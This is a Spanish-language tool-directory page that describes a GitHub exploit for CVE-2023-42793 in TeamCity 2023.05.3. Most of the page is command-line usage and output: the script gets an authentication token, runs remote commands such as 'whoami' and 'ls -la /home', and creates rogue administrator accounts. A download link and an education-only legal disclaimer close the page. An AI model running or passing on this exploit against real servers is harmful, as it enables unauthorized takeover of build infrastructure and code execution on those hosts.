Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/cxdxnt/cve-2023-42793
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubcxdxnt/cve-2023-42793

CVE-2023-42793

TeamCity 2023.05.3 - CVE-2023-42793 - Crear nombre de usuario administrador.

Ver Repositorio
hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-42793 - Crear usuario administrador

Ejemplo de ejecución de comando:

root@kitploit:~
python3 exploit.py -u http://localhost
User add token ->  eyJ0eXAiOiAiVENWMiJ9.YkZ0V2tzR3NvWXhZelRfZTN0cFF1SkZjVWVz.N2M0Njk2ZTgtNWZhYi00MTU5LWJmZjQtYWU1MDFlYzZiMGY1
Successful execution, preparing for the RCE
Command -> whoami
StdOut:tcuser

StdErr: 
Exit code: 0
Time: 16ms
Command -> ls -la /home
StdOut:total 8
drwxr-xr-x 2 root root 4096 Apr 15  2020 .
drwxr-xr-x 1 root root 4096 Feb 28  2024 ..

StdErr: 
Exit code: 0
Time: 23ms

En caso de que el token expire, se creará automáticamente uno nuevo.

root@kitploit:~
Command -> whoami
[-] Token expired, restarting...
[!]Error deleting user
User add token ->  eyJ0eXAiOiAiVENWMiJ9.ZVJiSTB6SGZWSEpldzhEa1o4cUdsWFlQRTJJ.NGQxOTg4ZWItNTJmYS00OWM3LWIwYmItZjcyODNkYjg5NTJj
Successful execution, preparing for the RCE
Command -> whoami
StdOut:tcuser

StdErr: 
Exit code: 0
Time: 24ms

Crear usuario administrador:

root@kitploit:~
python3 user_add_administrator.py -t http://127.0.0.1 -u cxdxnt -p testing -u [email protected]
User add token ->  eyJ0eXAiOiAiVENWMiJ9.Z21xU3ZtTXNYUXE2WGdkaWJCOFV4QWsxN2s0.NmMyZDE0YTItMDQ1OS00NGQ2LTk2YWEtNjg1MTU3ZGNiNjM0
Create username administrator

En caso de que ya exista un usuario:

root@kitploit:~
python3 user_add.py -t http://127.0.0.1 -u cxdxnt -p testing -u [email protected]
User add token ->  eyJ0eXAiOiAiVENWMiJ9.Q3ZFa0ExR2tBcGlSMUZ3ZWNyMUtNN0VPQmFN.Mzk0M2EyZjAtMzVhNi00YTU0LWFmNTctMTg4MThkZmU5MDA3
is already in use by some other user.

Aviso legal

Este repositorio es únicamente para fines educativos y de investigación en seguridad informática. El uso de los scripts y las técnicas aquí descritos para comprometer sistemas sin autorización es ilegal y viola leyes nacionales e internacionales, como la Ley 26.388 (Argentina), la CFAA (EE. UU.) y el Convenio de Budapest.

El autor no es responsable del mal uso de la información proporcionada aquí. El uso de este material está permitido únicamente en entornos controlados, laboratorios, CTFs o con la autorización explícita del propietario del sistema.

Si vas a realizar pruebas, asegúrate de tener permiso. El hacking sin autorización no es hacking ético; es un delito.

Descargar herramienta